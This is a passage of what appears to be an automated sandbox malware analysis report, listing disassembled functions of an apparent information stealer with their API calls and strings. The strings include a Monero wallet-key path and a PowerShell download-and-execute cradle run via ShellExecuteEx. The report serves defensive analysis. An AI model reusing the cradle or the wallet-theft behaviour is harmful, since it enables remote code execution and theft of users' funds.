                          • Part of subcall function 00878D90: GetFileAttributesA.KERNEL32(00000000,?,00861B54,?,?,0088564C,?,?,00880E1F), ref: 00878D9F
                          • Part of subcall function 00874570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00874580
                          • Part of subcall function 00874570: RtlAllocateHeap.NTDLL(00000000), ref: 00874587
                          • Part of subcall function 00874570: wsprintfA.USER32 ref: 008745A6
                          • Part of subcall function 00874570: FindFirstFileA.KERNEL32(?,?), ref: 008745BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 4a4456abe5c933db20634e9285307c8031a70dc31dae25ce808ef19a9d8a944b
                        • Instruction ID: e20c9452c54d94db738f2db1d087a350d951c81e61154ad68f7f904c1e675dbc
                        • Opcode Fuzzy Hash: 4a4456abe5c933db20634e9285307c8031a70dc31dae25ce808ef19a9d8a944b
                        • Instruction Fuzzy Hash: 8A3182B294020897CB54FBB4DC89EED77B8FB68700F408589B319D6085EF74D689CB92
                        Function 00872C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00872D85
                        Strings
                        • ')", xrefs: 00872CB3
                        • <, xrefs: 00872D39
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00872D04
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00872CC4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: be2078cb15bc173f41b2227bac5e91e26ee988bb73fdb5ab6c0bdde5e5b75e4d
                        • Instruction ID: 2d92b0eb75318c4e2cdabb5259f3c51fd441de8fc4beb7f26925f23b722a9dce
                        • Opcode Fuzzy Hash: be2078cb15bc173f41b2227bac5e91e26ee988bb73fdb5ab6c0bdde5e5b75e4d
                        • Instruction Fuzzy Hash: F641AF71C101089ADB58FBA4C895FDEBB74FF54700F408129E12AE6199DF74AA4ACF93
                        Function 00869E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00869F41
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 6b05721617136f2e17329ff0a4c8dafee8c56c22f2ccbc1b898ce0615b0752db
                        • Instruction ID: bfaef2fd5b75d26926caf130eff3c251bc81cbcf6a3e88ef993d20ca943cc618
                        • Opcode Fuzzy Hash: 6b05721617136f2e17329ff0a4c8dafee8c56c22f2ccbc1b898ce0615b0752db
                        • Instruction Fuzzy Hash: 2E61FE71910248DBDB18EFA8CC96BED7775FF84344F008118E91AEB295DB74AA06CB53
                        Function 00876920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 0087696C
                        • sscanf.NTDLL ref: 00876999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008769B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008769C0
                        • ExitProcess.KERNEL32 ref: 008769DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: bb20791697e107cfbeced319085a0f5dd0b0c2329fc21c0c82424c2c09d27cbc
                        • Instruction ID: dacff15714cb8a18bb4d2886c1a7439c063d09581d8bc755f07c18836fd0dbbb
                        • Opcode Fuzzy Hash: bb20791697e107cfbeced319085a0f5dd0b0c2329fc21c0c82424c2c09d27cbc
                        • Instruction Fuzzy Hash: 1E212C71D00209ABCF44EFE4D845AEEB7B5FF4C300F00812AE01AE3254EB349605CB65
                        Function 00877E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00877E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0115C370,00000000,00020119,?), ref: 00877E5E
                        • RegQueryValueExA.ADVAPI32(?,0116E2B8,00000000,00000000,000000FF,000000FF), ref: 00877E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00877E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 573a3065febaf17a039201ae12f03caceb567e2a6c6ee67fd7fbbe4e60cf7912
                        • Instruction ID: a2fa64573baa5310219e99ee2aca3494f1fdc1c66c05cc95970bd465768accba
                        • Opcode Fuzzy Hash: 573a3065febaf17a039201ae12f03caceb567e2a6c6ee67fd7fbbe4e60cf7912
                        • Instruction Fuzzy Hash: CF116DB2A4420AABD700CFD4DC49FBBBBB8FB09B14F108119F615E7280D7785801CBA1
                        Function 00879260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(0116E390,?,?,?,0087140C,?,0116E390,00000000), ref: 0087926C
                        • lstrcpyn.KERNEL32(00AAAB88,0116E390,0116E390,?,0087140C,?,0116E390), ref: 00879290
                        • lstrlen.KERNEL32(?,?,0087140C,?,0116E390), ref: 008792A7
                        • wsprintfA.USER32 ref: 008792C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: e1a48da4b66ad80110c71e10f1d4486861de063492aaf8b8db9cb39964bb5793
                        • Instruction ID: 90bdf3cee84a6be8f30760af0826dad5d23835e16de4561be2c02f47fd359e55
                        • Opcode Fuzzy Hash: e1a48da4b66ad80110c71e10f1d4486861de063492aaf8b8db9cb39964bb5793
                        • Instruction Fuzzy Hash: 4E01D375500208FFCB04DFE8C988EBE7BB9EB59354F108548F9098B285C731AE41DBA1
                        Function 008612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008612B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 008612BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008612D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008612F5
                        • RegCloseKey.ADVAPI32(?), ref: 008612FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 66b968cda60b29888632f4d821048d9ceb261c5e6cf616a4139690534db4fa80
                        • Instruction ID: 648ae2122ad8b3433444dae70a6629424b85d6b21ccfc1864372f5009105522b
                        • Opcode Fuzzy Hash: 66b968cda60b29888632f4d821048d9ceb261c5e6cf616a4139690534db4fa80
                        • Instruction Fuzzy Hash: 4901FBB9A40209BBDB00DFE0DC49FAEB7B8EB58701F008159FA05D72C0D7759A01CB51
                        Function 00876630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00876663
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00876726
                        • ExitProcess.KERNEL32 ref: 00876755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: ae9c9ff25a43586dbe24265773a51bf80519a327b9845c74aa8facb19b7b0352
                        • Instruction ID: 03663292b24f6104b4005359d2bdda61d15c7e0560acfde53af68f7a035efcd5
                        • Opcode Fuzzy Hash: ae9c9ff25a43586dbe24265773a51bf80519a327b9845c74aa8facb19b7b0352
                        • Instruction Fuzzy Hash: B1314BB1800218ABDB58EB94CC85BDEBB78FF54300F408198F319A6195DF74AA49CF5B
                        Function 008787C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00880E28,00000000,?), ref: 0087882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00878836
                        • wsprintfA.USER32 ref: 00878850
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 9dd55df11d334b196099b7a9700170deca87ceecbd7ea8d21c519c755f5f6681
                        • Instruction ID: 75d788e0a227875c10bb92ad712f71758dc137337056036c4ec5ef0fe477c69b
                        • Opcode Fuzzy Hash: 9dd55df11d334b196099b7a9700170deca87ceecbd7ea8d21c519c755f5f6681
                        • Instruction Fuzzy Hash: DF21EDB1A44209ABDB04DFD4DD49FAEBBF8FB49B11F104119F605A72C0C7799901CBA1
                        Function 00878D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0087951E,00000000), ref: 00878D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00878D62
                        • wsprintfW.USER32 ref: 00878D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 740b410276e38939ea9a920d0f0d4d3788febb3df9c5308b7fa1d3f3b8c318d2
                        • Instruction ID: 9cf1d1e5de5af74724b6712f1a45a75fe1c10610e14f55af15cfb1f82377dbb4
                        • Opcode Fuzzy Hash: 740b410276e38939ea9a920d0f0d4d3788febb3df9c5308b7fa1d3f3b8c318d2
                        • Instruction Fuzzy Hash: 88E046B1A4020ABBC700DFD4DD0AA6977A8EB09702F000098FD0986280DB799A018B92
                        Function 0086A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
